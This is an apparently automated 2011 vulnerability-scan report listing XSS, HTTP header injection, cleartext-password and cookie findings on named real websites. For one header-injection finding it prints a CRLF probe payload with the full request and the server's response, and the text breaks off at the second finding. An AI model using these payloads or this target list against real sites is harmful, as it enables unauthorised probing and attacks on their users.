Exploits, Research, DORKS, Unforgivible Vulnerabilities

Unforgivible Vulnerabilities in DORK Web Sites | Vulnerability Crawler Report

Report generated by Unforgivable Vulnerabilities, DORK Search, Exploit Research at Thu Jan 13 10:14:52 CST 2011.



DORK CWE-79 XSS Report

Loading

1. HTTP header injection

1.1. http://ad.br.doubleclick.net/getcamphist [REST URL parameter 1]

1.2. http://ad.br.doubleclick.net/getcamphist [src parameter]

1.3. http://ad.doubleclick.net/ad/N1823.microsoft.com/B5062614.67 [REST URL parameter 1]

1.4. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.53 [REST URL parameter 1]

1.5. http://ad.doubleclick.net/adj/N5767.msn.comOX2567/B4643263.3 [REST URL parameter 1]

1.6. http://m.doubleclick.net/dot.gif [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

2.2. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

2.3. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

2.4. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

2.5. http://digg.com/search [REST URL parameter 1]

2.6. http://digg.com/submit [REST URL parameter 1]

2.7. http://flowplayer.org/tools/ [REST URL parameter 1]

2.8. http://forum.jquery.com/topic/appendto-behaviour [name of an arbitrarily supplied request parameter]

2.9. http://jqueryui.com/themeroller/ [bgColorActive parameter]

2.10. http://jqueryui.com/themeroller/ [bgColorContent parameter]

2.11. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

2.12. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

2.13. http://jqueryui.com/themeroller/ [bgColorHover parameter]

2.14. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

2.15. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

2.16. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

2.17. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

2.18. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

2.19. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

2.20. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

2.21. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

2.22. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

2.23. http://jqueryui.com/themeroller/ [borderColorContent parameter]

2.24. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

2.25. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

2.26. http://jqueryui.com/themeroller/ [borderColorHover parameter]

2.27. http://jqueryui.com/themeroller/ [cornerRadius parameter]

2.28. http://jqueryui.com/themeroller/ [fcContent parameter]

2.29. http://jqueryui.com/themeroller/ [fcDefault parameter]

2.30. http://jqueryui.com/themeroller/ [fcHeader parameter]

2.31. http://jqueryui.com/themeroller/ [fcHover parameter]

2.32. http://jqueryui.com/themeroller/ [ffDefault parameter]

2.33. http://jqueryui.com/themeroller/ [fsDefault parameter]

2.34. http://jqueryui.com/themeroller/ [fwDefault parameter]

2.35. http://jqueryui.com/themeroller/ [iconColorContent parameter]

2.36. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

2.37. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

2.38. http://jqueryui.com/themeroller/ [iconColorHover parameter]

2.39. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.40. http://research.scottrade.com/services/modules/smarttext/smarttext.asp [click parameter]

2.41. http://research.scottrade.com/services/modules/smarttext/smarttext.asp [recent parameter]

2.42. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542** [REST URL parameter 2]

2.43. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542** [REST URL parameter 3]

2.44. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/89518.9922535792 [REST URL parameter 2]

2.45. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/89518.9922535792 [REST URL parameter 3]

2.46. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545** [REST URL parameter 2]

2.47. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545** [REST URL parameter 3]

2.48. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/54945.332603529096 [REST URL parameter 2]

2.49. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/54945.332603529096 [REST URL parameter 3]

2.50. http://www.adaptavist.com/display/~mgibson/Versions [REST URL parameter 3]

2.51. http://www.adaptavist.com/display/~mgibson/Versions [name of an arbitrarily supplied request parameter]

2.52. http://www.adaptavist.com/display/~mgibson/Versions [name of an arbitrarily supplied request parameter]

2.53. http://www.adotas.com/2010/12/are-you-a-search-geek-prove-it/ [REST URL parameter 3]

2.54. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

2.55. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

2.56. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

2.57. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]

2.58. http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/ [REST URL parameter 1]

2.59. http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/ [name of an arbitrarily supplied request parameter]

2.60. http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/ [name of an arbitrarily supplied request parameter]

2.61. http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/ [REST URL parameter 1]

2.62. http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/ [name of an arbitrarily supplied request parameter]

2.63. http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/ [name of an arbitrarily supplied request parameter]

2.64. http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/ [REST URL parameter 1]

2.65. http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/ [name of an arbitrarily supplied request parameter]

2.66. http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/ [name of an arbitrarily supplied request parameter]

2.67. http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/ [REST URL parameter 1]

2.68. http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/ [name of an arbitrarily supplied request parameter]

2.69. http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/ [name of an arbitrarily supplied request parameter]

2.70. http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/ [REST URL parameter 1]

2.71. http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/ [name of an arbitrarily supplied request parameter]

2.72. http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/ [name of an arbitrarily supplied request parameter]

2.73. http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/ [REST URL parameter 1]

2.74. http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/ [name of an arbitrarily supplied request parameter]

2.75. http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/ [name of an arbitrarily supplied request parameter]

2.76. http://www.myhealthnewsdaily.com/ten-medical-myths-0947/ [REST URL parameter 1]

2.77. http://www.myhealthnewsdaily.com/ten-medical-myths-0947/ [name of an arbitrarily supplied request parameter]

2.78. http://www.myhealthnewsdaily.com/ten-medical-myths-0947/ [name of an arbitrarily supplied request parameter]

2.79. http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/ [REST URL parameter 1]

2.80. http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/ [name of an arbitrarily supplied request parameter]

2.81. http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/ [name of an arbitrarily supplied request parameter]

2.82. http://www.nutrisystem.com/jsps_hmr/catalog/men/basic.jsp [categoryId parameter]

2.83. http://www.nutrisystem.com/jsps_hmr/catalog/men/silver.jsp [categoryId parameter]

2.84. http://www.nutrisystem.com/jsps_hmr/catalog/men/vegetarian.jsp [categoryId parameter]

2.85. http://www.nutrisystem.com/jsps_hmr/catalog/women/basic.jsp [categoryId parameter]

2.86. http://www.nutrisystem.com/jsps_hmr/catalog/women/silver.jsp [categoryId parameter]

2.87. http://www.nutrisystem.com/jsps_hmr/catalog/women/vegetarian.jsp [categoryId parameter]

2.88. http://www.tnooz.com/2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/ [REST URL parameter 5]

2.89. http://www.tnooz.com/2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/ [name of an arbitrarily supplied request parameter]

2.90. http://www.adaptavist.com/display/~mgibson/Versions [User-Agent HTTP header]

2.91. http://www.adotas.com/2010/12/are-you-a-search-geek-prove-it/ [User-Agent HTTP header]

2.92. http://www.cbsalary.com/quizzes/fun-jobs/ [Referer HTTP header]

2.93. http://www.cbsalary.com/quizzes/fun-jobs/ [Referer HTTP header]

2.94. http://www.quantcast.com/p-10v8JLtUuOYqQ [Referer HTTP header]

2.95. http://www.tnooz.com/2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/ [REST URL parameter 4]

3. Cleartext submission of password

3.1. http://digg.com/search

3.2. http://digg.com/submit

3.3. http://malsup.com/jquery/form/

3.4. http://malsup.com/jquery/form/

3.5. http://malsup.com/jquery/form/

3.6. http://malsup.com/jquery/form/

3.7. http://malsup.com/jquery/form/

3.8. http://malsup.com/jquery/form/

3.9. http://www.nutrisystem.com/jsps_hmr/about/index.jsp

3.10. http://www.nutrisystem.com/jsps_hmr/careers/index.jsp

3.11. http://www.nutrisystem.com/jsps_hmr/catalog/men/basic.jsp

3.12. http://www.nutrisystem.com/jsps_hmr/catalog/men/diabetes.jsp

3.13. http://www.nutrisystem.com/jsps_hmr/catalog/men/silver.jsp

3.14. http://www.nutrisystem.com/jsps_hmr/catalog/men/vegetarian.jsp

3.15. http://www.nutrisystem.com/jsps_hmr/catalog/menu/food.jsp

3.16. http://www.nutrisystem.com/jsps_hmr/catalog/women/basic.jsp

3.17. http://www.nutrisystem.com/jsps_hmr/catalog/women/diabetes.jsp

3.18. http://www.nutrisystem.com/jsps_hmr/catalog/women/silver.jsp

3.19. http://www.nutrisystem.com/jsps_hmr/catalog/women/vegetarian.jsp

3.20. http://www.nutrisystem.com/jsps_hmr/corporate/index.jsp

3.21. http://www.nutrisystem.com/jsps_hmr/faq/index.jsp

3.22. http://www.nutrisystem.com/jsps_hmr/giftcards/giftcard_selection_page.jsp

3.23. http://www.nutrisystem.com/jsps_hmr/guarantee/index.jsp

3.24. http://www.nutrisystem.com/jsps_hmr/help/contact.jsp

3.25. http://www.nutrisystem.com/jsps_hmr/help/site_map.jsp

3.26. http://www.nutrisystem.com/jsps_hmr/home/

3.27. http://www.nutrisystem.com/jsps_hmr/home/index.jsp

3.28. http://www.nutrisystem.com/jsps_hmr/how_it_works/index.jsp

3.29. http://www.nutrisystem.com/jsps_hmr/privacy/index.jsp

3.30. http://www.nutrisystem.com/jsps_hmr/product-pages/diabetic_overview.jsp

3.31. http://www.nutrisystem.com/jsps_hmr/product-pages/mens_overview.jsp

3.32. http://www.nutrisystem.com/jsps_hmr/product-pages/womens_overview.jsp

3.33. http://www.nutrisystem.com/jsps_hmr/shop/order_now.jsp

3.34. http://www.nutrisystem.com/jsps_hmr/success_stories/index.jsp

3.35. http://www.nutrisystem.com/jsps_hmr/terms/index.jsp

3.36. http://www.nutrisystem.com/jsps_hmr/tools_community/index.jsp

3.37. http://www.nutrisystem.com/jsps_hmr/user/login.jsp

4. Session token in URL

4.1. http://www.adaptavist.com/display/~mgibson/Versions

4.2. http://www.nutrisystem.com/webmedia1810

5. Password field submitted using GET method

5.1. http://digg.com/search

5.2. http://digg.com/submit

6. Cookie without HttpOnly flag set

6.1. http://forum.jquery.com/topic/appendto-behaviour

6.2. http://www.adaptavist.com/display/~mgibson/Versions

6.3. http://www.brothercake.com/

6.4. http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp

6.5. http://www.quantcast.com/p-10v8JLtUuOYqQ

6.6. http://ad.doubleclick.net/activity

6.7. http://ad.doubleclick.net/ad/N1823.microsoft.com/B5062614.67

6.8. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.53

6.9. http://ad.doubleclick.net/click

6.10. http://ad.doubleclick.net/clk

6.11. http://digg.com/submit

6.12. http://research.scottrade.com/public/knowledgecenter/help/help.asp

6.13. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**

6.14. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**

6.15. http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/

6.16. http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/

6.17. http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/

6.18. http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/

6.19. http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/

6.20. http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/

6.21. http://www.myhealthnewsdaily.com/ten-medical-myths-0947/

6.22. http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/

6.23. http://www.nutrisystem.com/css/hmr15/cost-calculator/style.css

6.24. http://www.nutrisystem.com/js/link_track.js

6.25. http://www.nutrisystem.com/jsps_hmr/

6.26. http://www.nutrisystem.com/jsps_hmr/about/index.jsp

6.27. http://www.nutrisystem.com/jsps_hmr/careers/index.jsp

6.28. http://www.nutrisystem.com/jsps_hmr/catalog/menu/food.jsp

6.29. http://www.nutrisystem.com/jsps_hmr/common/assignCampaign.jsp

6.30. http://www.nutrisystem.com/jsps_hmr/common/templates/body_assessment_form_v15.jsp

6.31. http://www.nutrisystem.com/jsps_hmr/corporate/index.jsp

6.32. http://www.nutrisystem.com/jsps_hmr/faq/index.jsp

6.33. http://www.nutrisystem.com/jsps_hmr/giftcards/giftcard_selection_page.jsp

6.34. http://www.nutrisystem.com/jsps_hmr/guarantee/index.jsp

6.35. http://www.nutrisystem.com/jsps_hmr/guided_selling/ajaxErrorUrl.jsp

6.36. http://www.nutrisystem.com/jsps_hmr/guided_selling/ajaxSuccessUrl.jsp

6.37. http://www.nutrisystem.com/jsps_hmr/guided_selling/gs_template_profile.jsp

6.38. http://www.nutrisystem.com/jsps_hmr/help/contact.jsp

6.39. http://www.nutrisystem.com/jsps_hmr/help/site_map.jsp

6.40. http://www.nutrisystem.com/jsps_hmr/home/

6.41. http://www.nutrisystem.com/jsps_hmr/home/index.jsp

6.42. http://www.nutrisystem.com/jsps_hmr/how_it_works/index.jsp

6.43. http://www.nutrisystem.com/jsps_hmr/nutrisystemd/hcp/healthcare_professionals.jsp

6.44. http://www.nutrisystem.com/jsps_hmr/privacy/index.jsp

6.45. http://www.nutrisystem.com/jsps_hmr/shop/order_now.jsp

6.46. http://www.nutrisystem.com/jsps_hmr/success_stories/index.jsp

6.47. http://www.nutrisystem.com/jsps_hmr/terms/index.jsp

6.48. http://www.nutrisystem.com/jsps_hmr/tools_community/index.jsp

6.49. http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp

6.50. http://www.nutrisystem.com/jsps_hmr/user/login.jsp

7. Password field with autocomplete enabled

7.1. http://digg.com/search

7.2. http://digg.com/submit

7.3. http://digg.com/submit

7.4. http://malsup.com/jquery/form/

7.5. http://malsup.com/jquery/form/

7.6. http://malsup.com/jquery/form/

7.7. http://malsup.com/jquery/form/

7.8. http://malsup.com/jquery/form/

7.9. http://malsup.com/jquery/form/

7.10. http://www.nutrisystem.com/jsps_hmr/about/index.jsp

7.11. http://www.nutrisystem.com/jsps_hmr/careers/index.jsp

7.12. http://www.nutrisystem.com/jsps_hmr/catalog/men/basic.jsp

7.13. http://www.nutrisystem.com/jsps_hmr/catalog/men/diabetes.jsp

7.14. http://www.nutrisystem.com/jsps_hmr/catalog/men/silver.jsp

7.15. http://www.nutrisystem.com/jsps_hmr/catalog/men/vegetarian.jsp

7.16. http://www.nutrisystem.com/jsps_hmr/catalog/menu/food.jsp

7.17. http://www.nutrisystem.com/jsps_hmr/catalog/women/basic.jsp

7.18. http://www.nutrisystem.com/jsps_hmr/catalog/women/diabetes.jsp

7.19. http://www.nutrisystem.com/jsps_hmr/catalog/women/silver.jsp

7.20. http://www.nutrisystem.com/jsps_hmr/catalog/women/vegetarian.jsp

7.21. http://www.nutrisystem.com/jsps_hmr/corporate/index.jsp

7.22. http://www.nutrisystem.com/jsps_hmr/faq/index.jsp

7.23. http://www.nutrisystem.com/jsps_hmr/giftcards/giftcard_selection_page.jsp

7.24. http://www.nutrisystem.com/jsps_hmr/guarantee/index.jsp

7.25. http://www.nutrisystem.com/jsps_hmr/help/contact.jsp

7.26. http://www.nutrisystem.com/jsps_hmr/help/site_map.jsp

7.27. http://www.nutrisystem.com/jsps_hmr/home/

7.28. http://www.nutrisystem.com/jsps_hmr/home/index.jsp

7.29. http://www.nutrisystem.com/jsps_hmr/how_it_works/index.jsp

7.30. http://www.nutrisystem.com/jsps_hmr/privacy/index.jsp

7.31. http://www.nutrisystem.com/jsps_hmr/product-pages/diabetic_overview.jsp

7.32. http://www.nutrisystem.com/jsps_hmr/product-pages/mens_overview.jsp

7.33. http://www.nutrisystem.com/jsps_hmr/product-pages/womens_overview.jsp

7.34. http://www.nutrisystem.com/jsps_hmr/shop/order_now.jsp

7.35. http://www.nutrisystem.com/jsps_hmr/success_stories/index.jsp

7.36. http://www.nutrisystem.com/jsps_hmr/terms/index.jsp

7.37. http://www.nutrisystem.com/jsps_hmr/tools_community/index.jsp

7.38. http://www.nutrisystem.com/jsps_hmr/user/login.jsp

7.39. http://www.nutrisystem.com/jsps_hmr/user/login.jsp

8. Cross-domain POST

8.1. http://www.adotas.com/2010/12/are-you-a-search-geek-prove-it/

8.2. http://www.adotas.com/2010/12/are-you-a-search-geek-prove-it/

9. Cookie scoped to parent domain

9.1. http://ad.doubleclick.net/activity

9.2. http://ad.doubleclick.net/ad/N1823.microsoft.com/B5062614.67

9.3. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.53

9.4. http://ad.doubleclick.net/click

9.5. http://ad.doubleclick.net/clk

9.6. http://www.cbsalary.com/quizzes/fun-jobs/

9.7. http://www.nutrisystem.com/jsps_hmr/common/assignCampaign.jsp

9.8. http://www.nutrisystem.com/jsps_hmr/home/

9.9. http://www.nutrisystem.com/jsps_hmr/home/index.jsp

9.10. http://www.nutrisystem.com/jsps_hmr/shop/order_now.jsp

9.11. http://www.nutrisystem.com/jsps_hmr/success_stories/index.jsp

9.12. http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp

9.13. http://www.nutrisystem.com/jsps_hmr/user/login.jsp

10. Cross-domain Referer leakage

10.1. http://ad.doubleclick.net/adj/N5767.msn.comOX2567/B4643263.3

10.2. http://digg.com/submit

10.3. http://jqueryui.com/themeroller/

10.4. http://research.scottrade.com/services/modules/smarttext/smarttext.asp

10.5. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**

10.6. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**

10.7. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**

10.8. http://www.cbsalary.com/quizzes/fun-jobs/

10.9. http://www.nutrisystem.com/jsps_hmr/catalog/men/basic.jsp

10.10. http://www.nutrisystem.com/jsps_hmr/catalog/men/diabetes.jsp

10.11. http://www.nutrisystem.com/jsps_hmr/catalog/men/silver.jsp

10.12. http://www.nutrisystem.com/jsps_hmr/catalog/men/vegetarian.jsp

10.13. http://www.nutrisystem.com/jsps_hmr/catalog/women/basic.jsp

10.14. http://www.nutrisystem.com/jsps_hmr/catalog/women/diabetes.jsp

10.15. http://www.nutrisystem.com/jsps_hmr/catalog/women/silver.jsp

10.16. http://www.nutrisystem.com/jsps_hmr/catalog/women/vegetarian.jsp

10.17. http://www.nutrisystem.com/jsps_hmr/home/

10.18. http://www.nutrisystem.com/jsps_hmr/home/index.jsp

10.19. http://www.nutrisystem.com/jsps_hmr/shop/order_now.jsp

10.20. http://www.nutrisystem.com/jsps_hmr/success_stories/index.jsp

10.21. http://www.nutrisystem.com/jsps_hmr/user/login.jsp

11. Cross-domain script include

11.1. http://dean.edwards.name/weblog/2006/06/again/

11.2. http://digg.com/search

11.3. http://digg.com/submit

11.4. http://flowplayer.org/tools/

11.5. http://forum.jquery.com/topic/appendto-behaviour

11.6. http://jqueryui.com/about

11.7. http://jqueryui.com/themeroller/

11.8. http://malsup.com/jquery/form/

11.9. http://research.scottrade.com/services/modules/smarttext/smarttext.asp

11.10. http://www.adotas.com/2010/12/are-you-a-search-geek-prove-it/

11.11. http://www.cbsalary.com/quizzes/fun-jobs/

11.12. http://www.cbsalary.com/quizzes/fun-jobs/

11.13. http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/

11.14. http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/

11.15. http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/

11.16. http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/

11.17. http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/

11.18. http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/

11.19. http://www.myhealthnewsdaily.com/ten-medical-myths-0947/

11.20. http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/

11.21. http://www.quantcast.com/p-10v8JLtUuOYqQ

11.22. http://www.tnooz.com/2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/

12. File upload functionality

13. Email addresses disclosed

13.1. http://dean.edwards.name/weblog/2006/06/again/

13.2. http://jqueryui.com/about

13.3. http://www.adotas.com/2010/12/are-you-a-search-geek-prove-it/

13.4. http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/

13.5. http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/

13.6. http://www.myhealthnewsdaily.com/ten-medical-myths-0947/

13.7. http://www.nutrisystem.com/jsps_hmr/catalog/men/diabetes.jsp

13.8. http://www.nutrisystem.com/jsps_hmr/catalog/women/diabetes.jsp

13.9. http://www.nutrisystem.com/jsps_hmr/corporate/index.jsp

13.10. http://www.nutrisystem.com/jsps_hmr/help/contact.jsp

13.11. http://www.nutrisystem.com/jsps_hmr/privacy/index.jsp

14. Private IP addresses disclosed

14.1. http://digg.com/search

14.2. http://digg.com/search

14.3. http://digg.com/search

14.4. http://digg.com/submit

14.5. http://digg.com/submit

14.6. http://digg.com/submit

14.7. http://www.quantcast.com/p-10v8JLtUuOYqQ

14.8. http://www.quantcast.com/p-10v8JLtUuOYqQ

15. HTML does not specify charset

15.1. http://ad.doubleclick.net/clk

15.2. http://jqueryui.com/about

15.3. http://jqueryui.com/themeroller/

16. Content type incorrectly stated

16.1. http://ad.doubleclick.net/clk

16.2. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**

16.3. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/89518.9922535792

16.4. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**

16.5. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/54945.332603529096

16.6. http://www.nutrisystem.com/images/home-v15/gift-card/giftcards.jpg

16.7. http://www.nutrisystem.com/images/home-v15/learn-more.jpg

16.8. http://www.nutrisystem.com/images/hp-carousel-122010/hoorayyou_static_default_bg.jpg

16.9. http://www.nutrisystem.com/images/hp-carousel-122010/promo_bg_chooseplan_1wk.jpg

16.10. http://www.nutrisystem.com/jsps_hmr/common/assignCampaign.jsp

16.11. http://www.nutrisystem.com/media/video-play-list.txt



1. HTTP header injection  next
There are 6 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.br.doubleclick.net/getcamphist [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /getcamphist

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8a99f%0d%0ae0282959983 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8a99f%0d%0ae0282959983;src=337209;host=metrics.nutrisystem.com%2Fb%2Fss%2Fnutrisystemprod1%2F1%2FH.22.1%2Fs83592933702748%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D26968B4605013993-6000010B4000F0FF%26%26ndh%3D1%26t%3D11%252F0%252F2011%252020%253A49%253A13%25202%2520360%26ns%3Dnutrisystem%26pageName%3DSalesFun%253AHome%26g%3Dhttp%253A%252F%252Fwww.nutrisystem.com%252Fjsps_hmr%252Fhome%252Findex.jsp%253F_requestid%253D566196%26cc%3DUSD%26vvp%3DDFA%2523337209%253Av3%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3DHome%253ASalesFun%26server%3Dwww.nutrisystem.com%26events%3Devent33%26c4%3DContent%26c5%3DSalesFun%26v6%3DIID_29521%2523%26c13%3D9%253A30PM%26c14%3DTuesday%26c15%3DWeekday%26v18%3DIID_29521%2523%26v19%3D9%253A30PM%26v20%3DTuesday%26v21%3DWeekday%26c26%3Dno_test%2523%26v26%3Dno_test%2523%26v27%3Dno_test%2523%26v41%3DDirect%2520Load%26v42%3DDirect%2520Load%26v43%3Dn%252Fa%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1158%26bh%3D750%26p%3DChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.230.5%253BJava%28TM%29%2520Platform%2520SE%25206%2520U23%253BWPI%2520Detector%25201.1%253BGoogle%2520Update%253BSilverlight%2520Plug-In%253BDefault%2520Plug-in%253B%26AQE%3D1&A2S=1;ord=798202721 HTTP/1.1
Host: ad.br.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nutrisystem.com/jsps_hmr/home/index.jsp?_requestid=566196
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8a99f
e0282959983
;src=337209;host=metrics.nutrisystem.com/b/ss/nutrisystemprod1/1/H.22.1/s83592933702748

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.br.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 341ea%0d%0a2dff0366dc2 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

